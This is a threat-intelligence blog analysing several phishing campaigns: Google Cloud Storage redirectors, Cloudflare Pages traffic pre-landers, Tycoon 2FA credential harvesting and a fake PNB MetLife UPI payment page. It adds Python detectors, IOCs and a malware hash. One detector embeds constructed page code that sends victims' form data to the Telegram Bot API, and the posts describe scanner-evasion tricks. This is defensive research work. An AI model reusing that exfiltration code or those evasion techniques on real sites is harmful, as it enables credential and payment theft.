Ongoing Phishing Campaign Abusing Google Cloud Storage to Redirect Users to Multiple Scam Pages

A few days ago, I published a blog analyzing a phishing campaign abusing Google Cloud infrastructure:

While continuing to monitor the infrastructure used in that campaign, I discovered several additional URLs hosted on Google Cloud Storage (storage[.]googleapis[.]com) that appear to be part of the same ecosystem. These pages act as intermediate redirectors, sending victims to a wide variety of phishing and scam sites hosted primarily on the .autos TLD.

What is interesting is that a single Google Cloud Storage page appears to function as a central redirect hub, distributing victims across multiple scam themes such as fake surveys, reward scams, antivirus alerts, job offers, and account storage warnings.

Newly Observed Google Cloud Storage URLs

The following URLs were identified during the investigation:


One particular page stood out during analysis:

storage[.]googleapis[.]com/whilewait/successcomes.html

This page appears to function as a traffic distribution page, redirecting visitors to multiple phishing sites depending on campaign configuration.

I also shared an earlier observation on X (Twitter):

Traffic Redirection to .autos Phishing Domains

The redirector page was observed sending users to various phishing domains, most of which are hosted under the .autos top-level domain.

These phishing sites are themed around different scams designed to lure victims into providing personal or financial information.

Below are the different campaign themes identified.

Netflix Reward Phishing Pages

Some pages impersonate Netflix reward programs, claiming users have won prizes or special promotions.

Domains involved:


Additional domains were also shared by an X user @skocherhan quoting my earlier post:


These pages typically present users with messages claiming they have been selected for a Netflix reward or promotional giveaway, encouraging them to complete a short survey to claim their prize.

Like the other scams in this campaign, the pages ultimately attempt to collect personal or payment information, often under the pretext of paying a small shipping fee or verifying eligibility.

Fake Dell Laptop Giveaway Survey

Another variation promotes a Dell laptop giveaway, typically claiming that users can win a Dell 16 DC16250 laptop worth $699.99.

Domains hosting these pages include:


These pages typically:

  • Ask the victim to answer a few survey questions.
  • Display a congratulatory message.
  • Request credit card details to pay for shipping fees.

Fake “AI Data Assistant – Earn $500/day” Job Lure

Another theme used in this campaign promotes a fake online job opportunity, claiming users can earn $500 per day as an AI data assistant.

Observed domains:


These pages typically claim:

  • No experience required
  • High daily earnings
  • Work from home opportunities

Users are often redirected through several steps designed to collect personal information or push affiliate offers.

“Antivirus Subscription Expired” Phishing Pages

Another set of pages impersonates security alerts, claiming the user’s antivirus subscription has expired.

Domains observed:


These pages typically:

  • Display fake security warnings
  • Urge users to renew antivirus protection
  • Redirect victims to payment or affiliate pages

“Cloud Storage Full” Phishing Pages

Another variation of this campaign uses cloud storage warnings, claiming the user’s storage account is full.

Observed domains:


Additional domains were also shared by an X user quoting my earlier post:

These pages often mimic services such as:

  • Google Drive
  • iCloud

The goal is to scare victims into clicking through fake upgrade or security alerts.

Fake Walmart Survey Scam

Several phishing domains impersonate Walmart survey reward campaigns, often promising a free gift or prize in exchange for completing a short survey.

Domains observed:


These pages typically display messages such as:

  • “Congratulations! You have been selected to receive a reward”
  • “Complete a short Walmart survey to claim your prize”

After the survey is completed, victims are usually asked to pay a small shipping fee, at which point their credit card information is harvested.

Key Observation

One of the most notable aspects of this campaign is the central role of the Google Cloud Storage page:

storage[.]googleapis[.]com/whilewait/successcomes.html

During testing, this page was observed redirecting users to multiple phishing domains across different scam themes.

This suggests it is functioning as a traffic distribution or redirect infrastructure, allowing attackers to rotate phishing destinations while keeping the initial delivery URL stable.

Using Google Cloud Storage also adds a layer of trust, as the domain belongs to a legitimate cloud provider.

Another interesting observation is that a single .autos domain can serve multiple phishing page themes after redirection from the Google Cloud Storage page. Depending on the redirection path or parameters, the same domain may host different scams such as:

  • Fake surveys
  • Reward scams
  • Storage full alerts
  • Antivirus subscription warnings
  • Job offer lures

This behavior indicates that the attackers are likely using a shared phishing kit or centralized backend infrastructure, allowing them to quickly rotate scam themes while reusing the same domains.

Another observation is the high volume of phishing emails currently being distributed using this infrastructure. Over the past few days, I have been receiving around 40–50 phishing emails within a 24-hour period, many of which contain links to Google Cloud Storage pages that act as redirectors to the phishing ecosystem described in this report.

URLs repeatedly observed in these emails include:

storage[.]googleapis[.]com/whilewait/successcomes.html
storage[.]googleapis[.]com/savelinge/goforward.html
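The redirect-hub behavior described above (a storage.googleapis.com HTML object followed within seconds by a .autos destination) is something a defender can hunt for in web proxy logs. The following is an added example, not code from the original post: it parses a constructed log format, flags the GCS HTML-object shape used by every redirector in this campaign, and alerts when the same client reaches a watched TLD shortly afterwards. The log format, the 30-second window and the watched-TLD set are assumptions; the hostnames in the sample lines reuse names quoted in the post purely as sample values.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy log lines in the shape "<ISO time> <client> <method> <url> <status>".
# They are not real logs; the hosts reuse names quoted in the post purely as sample values.
SAMPLE_LOG = """\
2026-01-14T09:12:01 10.0.0.7 GET https://storage.googleapis.com/whilewait/successcomes.html 200
2026-01-14T09:12:03 10.0.0.7 GET https://digital-shift-us-bin.autos/?theme=netflix 200
2026-01-14T09:12:09 10.0.0.7 GET https://alt-dig-gold-tab.autos/survey 200
2026-01-14T09:30:00 10.0.0.9 GET https://storage.googleapis.com/somebucket/report.pdf 200
2026-01-14T09:30:05 10.0.0.9 GET https://goldavgpenb.autos/ 200
2026-01-14T10:00:00 10.0.0.11 GET https://storage.googleapis.com/savelinge/goforward.html 200
2026-01-14T10:05:00 10.0.0.11 GET https://spacevertabnb.autos/ 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
WATCHED_TLDS = {"autos"}   # assumption: TLDs treated as high-risk redirect destinations
WINDOW_SECONDS = 30        # assumption: how quickly the next hop must follow the redirector


def parse_log(text):
    """Parse the sample log format into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, _method, url, _status = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "client": client,
                       "url": url, "host": (urlsplit(url).hostname or "").lower()})
    return events


def is_gcs_html_redirector(url):
    """True for storage.googleapis.com/<bucket>/<object>.html, the shape of every redirector in the post."""
    p = urlsplit(url)
    return ((p.hostname or "").lower() == "storage.googleapis.com"
            and p.path.lower().endswith(".html")
            and p.path.count("/") >= 2)


def is_watched_tld(host):
    return host.rsplit(".", 1)[-1] in WATCHED_TLDS


def find_redirect_chains(events, window_seconds=WINDOW_SECONDS):
    """Alert when a client fetches a GCS HTML redirector and then a watched-TLD host inside the window."""
    window = timedelta(seconds=window_seconds)
    by_client = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_client.setdefault(e["client"], []).append(e)
    alerts = []
    for client, evs in by_client.items():
        for i, e in enumerate(evs):
            if not is_gcs_html_redirector(e["url"]):
                continue
            # Later requests from the same client that land on a watched TLD within the window.
            hops = [f["host"] for f in evs[i + 1:]
                    if f["ts"] - e["ts"] <= window and is_watched_tld(f["host"])]
            if hops:
                alerts.append({"client": client, "redirector": e["url"], "destinations": hops})
    return alerts


if __name__ == "__main__":
    for a in find_redirect_chains(parse_log(SAMPLE_LOG)):
        print(f"{a['client']}: {a['redirector']} -> {', '.join(a['destinations'])}")
```

Because the TDS throttles repeat visits from one IP, the first chain seen per client is the reliable signal; later visits from the same address may legitimately show the redirector with no follow-on hop.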

Indicators of Compromise (IOCs)

Google Cloud URLs


Phishing Domains


This campaign demonstrates how attackers continue to abuse trusted cloud infrastructure such as Google Cloud Storage to host redirectors that distribute victims to multiple phishing pages.

By using legitimate cloud services as part of the attack chain, threat actors can increase credibility and reduce the likelihood of immediate blocking.

The use of large numbers of disposable .autos domains further allows attackers to rotate phishing pages frequently while keeping the delivery infrastructure intact.

In addition, the system appears to restrict repeated access attempts from the same IP address. After a user successfully reaches a phishing page through the redirector, subsequent attempts to access similar URLs from the same IP may result in the page failing to load or redirecting to unrelated sites. This behavior suggests the presence of IP-based filtering or traffic distribution logic, commonly used in malicious traffic distribution systems (TDS) to control how often a visitor can access the phishing infrastructure.

Cloudflare Pages “Continue Read” Redirect Kit Abused for Phishing, Adware, and Malware Delivery

I identified a long-running redirect infrastructure abusing Cloudflare Pages (pages.dev) to host benign-looking SEO articles (for example, celebrity “net worth” blogs or gaming help content) that display a forced “Continue reading / Continue Read” pop-up shortly after page load.

Once the user clicks the button, the browser is redirected into downstream infrastructure that may lead to:

  • Credential-harvesting phishing pages
  • Adware / PUP installers
  • Trojan or malware droppers
  • Fake browser download lures (observed: Opera-themed “diagnostics” funnel)
  • QR-code / fake CAPTCHA social-engineering pages

More than 250 URLs were observed using the same visual template and behavior, and historical evidence from URLScan shows activity persisting for 5 months, suggesting deliberate reputation building and SEO indexing.

Initial Infection Vector: Benign SEO Content on Cloudflare Pages

The landing pages appear as normal blog articles but automatically display a modal message:

“Continue reading by clicking the button below.”

This design ensures the redirect is user-initiated, helping bypass automated scanners and reputation systems.

Common characteristics

  • Hosted on: *.pages.dev
  • SEO-style article content
  • Modal overlay appears a few seconds after page load
  • Redirect only occurs after button click

Scale, Persistence, and Search Engine Exposure

Across the analyzed samples, more than 250 distinct URLs were identified showing identical UI and UX behavior, indicating the use of the same phishing template or kit deployed across different article topics. The activity has remained visible for approximately five months based on URLScan observations, suggesting persistence rather than short-lived campaigns. Additionally, some of these pages have been indexed in Google search results, significantly increasing the likelihood of exposure to real users and amplifying the overall risk posed by the operation.

Redirect Logic (Click-Gated Pre-Lander Behavior)

The redirect mechanism is implemented using delayed modal display and a click-triggered JavaScript redirect.

Key Observation

Across many different pages, most samples use the same redirect destination inside window.open().

This is important because it shows that the pages.dev sites are probably not standalone phishing pages created one by one. Instead, they appear to work more like traffic pre-landers that quietly direct visitors to a shared backend system. The key= parameter in the URL also looks intentional rather than random, and it is likely being used for tracking or routing within the campaign, possibly as a campaign ID, an affiliate tracking token, or even a value used to classify or group potential victims.

In short:

Multiple benign-looking SEO pages are acting as entry points into a centralized redirect infrastructure.

Central Redirector Role in the Infection Chain

The shared redirect endpoint:

hxxps://preservationwristwilling[.]com/utx3iw6i?key=<token>

likely serves as a Traffic Distribution System (TDS) decision node, responsible for:

  • Geo/IP filtering
  • Proxy/VPN detection
  • User-agent validation
  • Campaign routing
  • Conditional payload delivery
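The two traits that make these pre-landers identifiable statically are the delayed modal and the click handler that calls window.open() toward one shared endpoint. The following is an added example, not the kit's code or the post's own tooling: it scans constructed HTML samples for that pattern, pulls out the external window.open() target and its key= value, and clusters pages by the (host, path) they feed, which is how a shared TDS endpoint surfaces across many unrelated article topics. The sample pages, the article text and the key values are made up; the endpoint host and path are the ones quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed pre-lander samples (not captured pages). The TDS host/path are the ones quoted in
# the post; the page URLs, article text and key= values are made up for the example.
SAMPLES = {
    "https://example-a.pages.dev/celebrity-net-worth": """
<html><body><article><h1>Net worth article</h1><p>Filler text.</p></article>
<div id="gate" style="display:none"><p>Continue reading by clicking the button below.</p>
<button id="go">Continue Read</button></div>
<script>
setTimeout(function(){document.getElementById('gate').style.display='block';}, 3000);
document.getElementById('go').onclick=function(){window.open('https://preservationwristwilling.com/utx3iw6i?key=abc123');};
</script></body></html>""",
    "https://example-b.pages.dev/game-guide": """
<html><body><article><h1>Game guide</h1></article>
<div id="gate" style="display:none"><button id="go">Continue Read</button></div>
<script>
setTimeout(()=>{document.getElementById('gate').style.display='block'}, 2500);
document.getElementById('go').addEventListener('click', ()=>{ window.open("https://preservationwristwilling.com/utx3iw6i?key=zzz999"); });
</script></body></html>""",
    "https://benign.pages.dev/docs": """
<html><body><article><h1>Docs</h1></article><script>console.log('hi')</script></body></html>""",
}

DELAY_RE = re.compile(r"setTimeout\s*\(", re.I)
CLICK_RE = re.compile(r"\.onclick\s*=|addEventListener\s*\(\s*['\"]click['\"]", re.I)
OPEN_RE = re.compile(r"window\.open\s*\(\s*['\"]([^'\"]+)['\"]", re.I)


def analyze_page(page_url, html):
    """Describe whether a page is click-gated and where its window.open() calls send the visitor."""
    own_host = urlsplit(page_url).hostname
    rec = {"page": page_url,
           "delayed_modal": bool(DELAY_RE.search(html)),
           "click_handler": bool(CLICK_RE.search(html)),
           "targets": []}
    for target in OPEN_RE.findall(html):
        p = urlsplit(target)
        if not p.hostname or p.hostname == own_host:
            continue  # only off-site destinations matter for the TDS question
        rec["targets"].append({"host": p.hostname, "path": p.path,
                               "key": parse_qs(p.query).get("key", [None])[0]})
    rec["click_gated_redirect"] = (rec["delayed_modal"] and rec["click_handler"]
                                   and bool(rec["targets"]))
    return rec


def cluster_by_tds(records):
    """Group click-gated pages by the (host, path) they redirect to.

    Many pages sharing one endpoint, each with its own key=, is the pre-lander/TDS pattern."""
    clusters = {}
    for r in records:
        if not r["click_gated_redirect"]:
            continue
        for t in r["targets"]:
            clusters.setdefault((t["host"], t["path"]), []).append((r["page"], t["key"]))
    return clusters


if __name__ == "__main__":
    recs = [analyze_page(u, h) for u, h in SAMPLES.items()]
    for endpoint, pages in cluster_by_tds(recs).items():
        print(endpoint, "<-", pages)
```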

Simplified Kill Chain

Anti-Analysis Behavior: Proxy / VPN Detection

During testing, downstream pages performed VPN/Proxy checks.

If anonymity was detected, the page displayed:

“Anonymous Proxy detected.”

and stopped further redirection.

Security Impact

From a security perspective, this behavior is particularly concerning because it makes deeper analysis much harder. By blocking or redirecting automated environments, it can prevent sandboxes and researchers from ever reaching the real payload, which in turn leads to very low antivirus detection rates. As a result, automated scans may incorrectly appear clean, creating a false sense of safety even though malicious activity may still be present behind the scenes.

Observed Downstream Outcomes

1) Fake File Download Funnel – S3 ZIP Payload

One redirect path showed a “Your File Download Is Ready” page, leading to:

  • Intermediate download host (e.g., loaditfile[.]com)
  • Final payload stored on Amazon S3 (SetupFile-xxxx.zip)

2) Fake Browser Diagnostics – Opera Download Lure

Another branch displayed a fake compatibility/diagnostics score (e.g., 40/100) urging users to:

“Download Opera Browser”

This pattern feels very similar to the affiliate-driven browser installation funnels often seen in malvertising campaigns, where traffic is quietly redirected through multiple steps before reaching the final payload or monetization stage.

3) QR Code / Fake CAPTCHA Social Engineering

Some redirects presented:

  • “Prove you are not a robot”
  • QR code requiring mobile scan

Flows like this are commonly designed to move victims step by step toward the attacker’s real objective. In many cases, the final destination can be a phishing page that steals credentials, a subscription fraud scheme that silently charges the user, or even the delivery of mobile malware disguised as a legitimate download.

Payload Example and Low Detection Context

One observed executable sample (adware/PUP classification):

SHA256: be590100ecdcae5ce4b7b42f87082e201fcb2f38c114c8fbc6640ad9b9a0708a

VirusTotal showed detection

What makes this particularly notable is that the overall setup closely matches how modern malvertising Traffic Distribution Systems (TDS) typically operate. The infrastructure shows several familiar patterns, such as abusing a trusted hosting platform like Cloudflare Pages, allowing pages to be indexed by search engines to attract organic traffic, and using click-gated redirects to evade automated analysis. Behind the scenes, everything appears to funnel through a centralized redirect endpoint where the final payload can be delivered conditionally, depending on the visitor. This kind of design also supports multiple monetization paths rather than a single outcome. Taken together, it suggests we are not looking at just one phishing kit, but a broader shared redirect ecosystem designed to distribute traffic at scale.

Indicators of Compromise (IOCs)

Domain

  • preservationwristwilling[.]com
  • Path: /utx3iw6i
  • Query Parameter: key=<token>
  • loaditfile[.]com

Malicious Sample

  • be590100ecdcae5ce4b7b42f87082e201fcb2f38c114c8fbc6640ad9b9a0708a
  • Windows Executable
  • Classification: Adware/PUP
  • VirusTotal Detection

Network Indicator

preservationwristwilling[.]com/utx3iw6i?key=

URLScan.io search result

This campaign highlights how attackers carefully blend several techniques to stay under the radar and keep their operation running for long periods. By abusing legitimate hosting services, leveraging SEO poisoning to attract real users, using click-triggered redirects to avoid automated detection, and routing visitors through a centralized traffic system, they create a stealthy and resilient infrastructure capable of quietly delivering malware or other malicious outcomes over time.

Tycoon 2FA Campaign Abusing *.contractors Domains for Gmail and Microsoft 365 Credential Harvesting

Overview

Over the past few weeks, I have been tracking a credential harvesting campaign that repeatedly abuses newly registered *.contractors domains to deliver Gmail and Microsoft 365/Outlook phishing pages.

While the social engineering lures vary, including ICANN email verification, document sharing, and account security prompts, the underlying infrastructure, tooling, and execution flow remain consistent.

Based on analysis of the phishing HTML, JavaScript, and runtime behavior, this activity can be attributed with high confidence to the Tycoon 2FA phishing kit.

This attribution is supported by distinctive Tycoon specific client side tradecraft, including MFA aware flows, advanced anti-analysis logic, and encrypted runtime loaders, as shown below.

Technical Evidence Supporting Tycoon 2FA Attribution

Analysis of the extracted HTML and JavaScript reveals multiple Tycoon 2FA specific behaviors that go beyond generic phishing kits.

Anti-Analysis & Sandbox Evasion Logic

The phishing pages actively detect analysis environments and developer tools, immediately terminating execution or redirecting the user if detected:

Additional protections disable common inspection techniques:

This multi-layered anti-analysis logic is a well known characteristic of Tycoon 2FA deployments, commonly observed across multiple campaigns leveraging this phishing-as-a-service (PhaaS) framework.

Runtime Debugger Detection & Forced Redirect

The kit also employs debugger timing detection to identify active inspection and force redirection:

This technique is specifically used by Tycoon based phishing frameworks to evade dynamic analysis and sandbox detonation.

ICANN Email Verification Lure

One of the more recent samples impersonates ICANN (Internet Corporation for Assigned Names and Numbers) and claims that the recipient’s email address must be verified to avoid domain-related disruption.

The email states that:

  • The recipient’s email is listed as the owner contact for a domain
  • The address is allegedly unverified or inactive
  • Failure to verify may result in email suspension

A verification link is provided, styled to appear ICANN-related. However, hovering over the link reveals that it actually points to attacker controlled infrastructure hosted outside of any legitimate ICANN or registrar domain. In this case, the observed link resolved to:

hxxps://recontact252.bluvias.de/572pectoral/$anurag@malwr-analysis.com

The URL embeds the recipient’s email address directly in the path, a common personalization technique used in targeted phishing campaigns to increase credibility and successful credential submission.

Redirection Flow: CAPTCHA as an Anti-Analysis Gate

Clicking the verification link does not immediately present a login page.

Instead, victims are routed through a fake CAPTCHA / “confirm you’re human” page, which serves as a deliberate execution delay.

This delay is important for two reasons:

  • Automated sandbox services (e.g., URLScan) often complete scanning before the CAPTCHA stage is reached, meaning the actual phishing payload is never rendered during automated analysis.
  • User interaction is required to proceed, filtering out non-human traffic and reducing detection rates.

Final Payload: Gmail & Microsoft 365 Tycoon 2FA Lures

After CAPTCHA completion, victims are redirected to high-fidelity Gmail or Microsoft 365 / Outlook login pages, depending on the campaign variant.

Observed behaviors include:

  • Accurate UI and branding replication
  • Email address prefilled or dynamically referenced
  • Transition into multi-step authentication flows
  • MFA approval interception and credential capture

Despite branding differences, both lures share identical loader logic, obfuscation patterns, and runtime behavior, confirming they are part of the same Tycoon 2FA campaign.

Infrastructure Reuse: *.contractors Domains

Across all observed samples, the campaign consistently abuses freshly registered .contractors domains, often using randomized subdomains and long URL paths.

Examples observed include:


Common characteristics observed across these campaigns include very recently registered domains, most notably on 07 January 2026 and 14 January 2026, along with randomized URL paths and identifiers designed to evade detection. Victim email addresses are embedded directly within the URLs to personalize lures and enable tracking.
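The URL shape described above (a service-style subdomain in front of a freshly registered .contractors domain, a random path segment containing "!" or "@", and a trailing "$" segment carrying the target's address, either plain as in the ICANN lure or base64-encoded) can be scored from mail-gateway or proxy URL feeds. The following is an added example, not the kit's code or the post's tooling: it recognises the personalization segment without needing the real kit, and applies a simple additive score whose weights and threshold are my own assumptions. The sample URLs, domains and the address user@example.com are constructed.

```python
import base64
import re
from urllib.parse import urlsplit, unquote

# Constructed URLs modelled on the path shapes quoted in the post. Domains, tokens and the
# address user@example.com (base64: dXNlckBleGFtcGxlLmNvbQ==) are made up for the example.
SAMPLES = [
    "https://datacenter.example-one.contractors/i!2zDbFPEvdm/",
    "https://pytorch.example-two.contractors/Hik3GWNtRtmoaf@Ul5FNuB3/$dXNlckBleGFtcGxlLmNvbQ==",
    "https://recontact252.example-three.de/572pectoral/$user@example.com",
    "https://docs.example-four.contractors/",
    "https://www.example.com/about",
]

EMAIL_RE = re.compile(r"^[^@\s/]+@[^@\s/]+\.[A-Za-z]{2,}$")
# Alphanumeric segment that contains at least one '!' or '@' (the random token style in the samples).
RANDOM_SEG_RE = re.compile(r"^[A-Za-z0-9]*[!@][A-Za-z0-9!@]*$")
SUSPICIOUS_THRESHOLD = 4   # assumption; tune against your own traffic


def _try_base64(s):
    """Decode s as base64 text, tolerating missing padding; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(s + "=" * (-len(s) % 4), validate=True).decode("utf-8")
    except Exception:
        return None


def extract_personalization(segment):
    """Recognise a '$'-prefixed path segment carrying the target address.

    Returns ("plain", addr) or ("base64", addr), or None when the segment is something else."""
    if not segment.startswith("$"):
        return None
    token = unquote(segment[1:])
    if EMAIL_RE.match(token):
        return ("plain", token)
    decoded = _try_base64(token)
    if decoded and EMAIL_RE.match(decoded):
        return ("base64", decoded)
    return None


def classify_url(url):
    """Score one URL against the traits described in the post and return the evidence."""
    p = urlsplit(url)
    labels = (p.hostname or "").lower().split(".")
    segs = [s for s in p.path.split("/") if s]
    tld = labels[-1] if labels else ""
    random_segment = any(RANDOM_SEG_RE.match(s) for s in segs)
    personalization = next((r for r in map(extract_personalization, segs) if r), None)
    score = 0
    if tld == "contractors":
        score += 2   # the TLD this cluster keeps registering
    if len(labels) >= 3:
        score += 1   # service-style subdomain (datacenter., pytorch., ...) on a fresh domain
    if random_segment:
        score += 2
    if personalization:
        score += 2   # victim address in the path, used for lure personalization and tracking
    return {"url": url, "tld": tld, "random_segment": random_segment,
            "personalized": personalization is not None,
            "personalization_form": personalization[0] if personalization else None,
            "score": score, "suspicious": score >= SUSPICIOUS_THRESHOLD}


if __name__ == "__main__":
    for u in SAMPLES:
        r = classify_url(u)
        print(f"{r['score']:>2} {'SUSPICIOUS' if r['suspicious'] else 'ok        '} {u}")
```

Registration age is the strongest signal the post names; a real pipeline would add a WHOIS/RDAP age check to the score, which this offline example leaves out.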

Observed Evasion via Decoy Landing Pages

When analysis is detected or when execution fails, the infrastructure does not return an error page.

Instead, victims or scanners are redirected to benign decoy landing page templates, including:

  • Finquick
  • Flowguide
  • Desio Copilot

These templates act as decoy content, helping:

  • Evade automated detection
  • Reduce suspicion during manual review
  • Prolong domain lifespan

This fallback behavior has been repeatedly observed in Tycoon-based phishing campaigns.

Campaign Scope: *.contractors Domains Observed on URLScan

During this investigation, I identified multiple .contractors domains associated with this campaign through URLScan submissions and pivoting.

A consolidated list of all observed .contractors domains, along with scan links and timestamps, will be provided below for reference and detection purposes.

This activity represents a coordinated, MFA aware phishing campaign, not isolated incidents.

While this analysis identifies multiple .contractors domains and consistent infrastructure patterns, it is likely that additional domains and variants are in use beyond those documented here. The findings in this post are based on artifacts and infrastructure observed within the scope of URLScan, and the full extent of the campaign may be broader.

Additional Infrastructure Observed

During continued investigation, I identified additional, distinct domains serving the same Microsoft 365 / Outlook Tycoon 2FA lure, indicating broader infrastructure reuse beyond the initially observed .contractors clusters.

These domains exhibit the same execution flow, CAPTCHA gating, MFA-aware login sequence, and post-authentication behavior, confirming they are part of the same phishing operation, rather than unrelated or opportunistic reuse.

URLScan.io hash search

Note on Campaign Scale

The domains and infrastructure documented above represent only a subset of the total activity observed during this investigation. While many additional domains and variants were identified, listing all of them would significantly expand the scope of this post.

For the purposes of this write-up, I will leave the analysis here, focusing on representative samples that clearly demonstrate the campaign’s tradecraft and attribution.

Fake “PNB MetLife Payment Gateway” Page Stealing Customer Details and Redirecting Victims to UPI Payments

Overview

While actively hunting for phishing sites, I came across multiple web pages impersonating PNB MetLife Insurance and presenting themselves as official policy premium payment gateways. This activity highlights how scammers deliberately target reputed and widely trusted brands to exploit existing customer trust and increase the likelihood of successful financial fraud. Although the pages claim to offer legitimate premium payment and policy servicing options, analysis of the underlying HTML and JavaScript shows that no real payment processing or backend validation is involved at any stage.

The pages are optimized for mobile devices, both in layout and interaction design. This strongly suggests that victims are likely being lured via SMS messages, although delivery via email, social media platforms, or messaging apps cannot be ruled out.

Fake PNB MetLife Payment Gateway – Initial Landing Page

The first template presents a mobile-friendly page branded as “PNB MetLife Payment Gateway”. It immediately prompts users to enter their name, policy number and mobile number, claiming these details are required to proceed with premium payment.

What is immediately noticeable is that the page does not validate any of the entered information. Any arbitrary values are accepted, and the user is allowed to proceed to the next step without verification.

hxxps://pnb-metlife-g-shiv-1aad8zgyup.edgeone.app/

Stealthy Data Exfiltration via Telegram Bots

Once the user submits the first form, the entered details are silently exfiltrated using the Telegram Bot API. Instead of communicating with a legitimate payment backend, the page sends captured information directly to Telegram, where it can be monitored in real time by the attacker.

The stolen data includes the victim’s name, policy number, and mobile number. Hardcoded Telegram bot tokens and chat IDs are embedded directly in the page’s JavaScript, leaving no ambiguity about the intent of the page.

During investigation, multiple Telegram bots and operator accounts were observed across related samples. Bots such as pnbmetlifesbot and goldenxspy_bot are used to collect victim data, while operator accounts including darkdevil_pnb and prabhatspy appear to receive and monitor these submissions.

Payment Amount Collection and Transition to UPI Flow

After the initial data theft, victims are taken to a second page asking them to enter the payment amount. Again, there is no backend validation or policy lookup. Any amount can be entered, and once submitted, this value is also sent to Telegram.

Immediately after this step, the page transitions into a UPI-based payment flow. The form disappears, and the victim is shown a QR code along with a countdown timer, creating urgency and psychological pressure.

QR Code Based UPI Payment Redirection

Once the victim submits the payment amount, the page dynamically switches to a QR based UPI payment flow. At this stage, no real payment gateway is involved. Instead, the JavaScript generates a UPI payment URI, renders it as a QR code, and pushes the victim toward completing the transaction inside a legitimate UPI app.

The following JavaScript snippet, extracted from the page, shows how the attacker generates the UPI QR code on the client side:

This code constructs a upi://pay URI and renders it as a QR code directly in the browser. Notably, the amount parameter is omitted or set to zero, forcing the victim to manually enter the amount in their UPI app.

Clipboard Abuse and Forced App Redirection

In addition to QR based payments, the page also includes direct buttons for PhonePe and Paytm. Clicking these buttons triggers JavaScript that silently copies the attacker controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link.

The following snippet highlights this behavior:

This technique ensures that even if the victim does not scan the QR code, the UPI ID is already copied and ready to be pasted inside the payment app. Redirecting users into real UPI applications significantly lowers suspicion and increases the likelihood of successful fraud.
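The three client-side behaviours described in this section and the two before it (Telegram Bot API exfiltration with a hardcoded token, a client-generated upi://pay URI with the amount left blank, and a clipboard write followed by a payment-app deep link) are all visible in the page source, so they can be extracted from a saved page or a URLScan DOM dump. The following is an added example, not the kit's code or the post's own snippets: it scans a constructed fragment that mimics those behaviours, pulls out the exfiltration endpoint, the payee VPA and the deep links, and notes whether the amount is left for the victim to type. The bot token, chat id, VPA and app-scheme list are placeholders or assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed page fragment reproducing the behaviours described in the post. The token, chat id
# and payee VPA are placeholders, not the values from the real kit.
SAMPLE_HTML = """
<form id="f"><input name="name"><input name="policy"><input name="mobile"></form>
<script>
const BOT = "000000000:PLACEHOLDERTOKEN";
const CHAT = "111111111";
function send(text){
  fetch("https://api.telegram.org/bot" + BOT + "/sendMessage", {method:"POST",
    body: JSON.stringify({chat_id: CHAT, text: text})});
}
function showQr(){
  const uri = "upi://pay?pa=victimpay@examplebank&pn=PNB%20MetLife&am=0&cu=INR";
  new QRCode(document.getElementById("qr"), uri);
}
document.getElementById("phonepe").onclick = function(){
  navigator.clipboard.writeText("victimpay@examplebank");
  window.location.href = "phonepe://pay?pa=victimpay@examplebank";
};
</script>
"""

FORM_FIELD_RE = re.compile(r"<input[^>]*name=['\"]([^'\"]+)", re.I)
TELEGRAM_API_RE = re.compile(r"api\.telegram\.org/bot", re.I)
BOT_TOKEN_RE = re.compile(r"['\"](\d{6,}:[A-Za-z0-9_\-]{10,})['\"]")   # bot token literal shape
UPI_URI_RE = re.compile(r"['\"](upi://pay\?[^'\"]+)['\"]", re.I)
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
# Payment-app schemes to watch for; assumption, extend for other apps you care about.
DEEPLINK_RE = re.compile(r"['\"]((?:phonepe|paytmmp|tez|gpay)://[^'\"]+)['\"]", re.I)


def parse_upi_uri(uri):
    """Break a upi://pay URI into payee fields and flag an empty/zero amount."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(uri).query).items()}
    amount = q.get("am")
    return {"payee_vpa": q.get("pa"), "payee_name": q.get("pn"), "amount": amount,
            "currency": q.get("cu"),
            # The post notes the kit omits or zeroes the amount so the victim types it in the app.
            "amount_left_to_victim": amount in (None, "", "0", "0.00")}


def scan_page(html):
    """Extract exfiltration and payment-redirection indicators from page source."""
    upi = [parse_upi_uri(u) for u in UPI_URI_RE.findall(html)]
    report = {
        "fields": FORM_FIELD_RE.findall(html),
        "telegram_exfil": bool(TELEGRAM_API_RE.search(html)),
        "bot_tokens": BOT_TOKEN_RE.findall(html),
        "upi": upi,
        "clipboard_vpas": CLIPBOARD_RE.findall(html),
        "deeplinks": DEEPLINK_RE.findall(html),
    }
    payees = {u["payee_vpa"] for u in upi} | set(report["clipboard_vpas"])
    for link in report["deeplinks"]:
        payees.add(parse_qs(urlsplit(link).query).get("pa", [None])[0])
    report["payee_vpas"] = sorted(v for v in payees if v)
    report["verdict"] = ("payment-fraud-kit"
                         if report["telegram_exfil"] and (upi or report["deeplinks"])
                         else "review")
    return report


if __name__ == "__main__":
    for k, v in scan_page(SAMPLE_HTML).items():
        print(f"{k}: {v}")
```

The payee VPAs and bot tokens are the values worth sharing with the payment provider and with Telegram abuse contacts, since the post notes they are what changes between otherwise identical deployments.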

Second Phishing Template – Premium Update and Bank/Card Harvesting

In addition to the basic payment-only template, a more advanced variant was also observed. This second template follows a slightly different flow and is significantly more dangerous, as it escalates from payment fraud to full banking and card data theft.

The landing page again impersonates PNB MetLife and asks for name, policy number, and mobile number. After this, the victim is presented with multiple options such as Update Amount, Refund Your Amount, and Add AutoDebit System, creating the illusion of legitimate policy servicing.

hxxps://pnb-metlife-web-india-2025-pvt-xi0ogr8l7-2fhp3fxm5e.edgeone.app/

When the victim selects “Update Amount,” they are taken to a page prompting them to enter a new premium amount. After submitting the amount, the page displays a confirmation screen showing the entered policy number and amount, along with a button labeled “Complete Update.”

Bank and Card Details Harvesting

The next stage is where the attack becomes significantly more severe. The victim is presented with a Bank Details for Verification page.

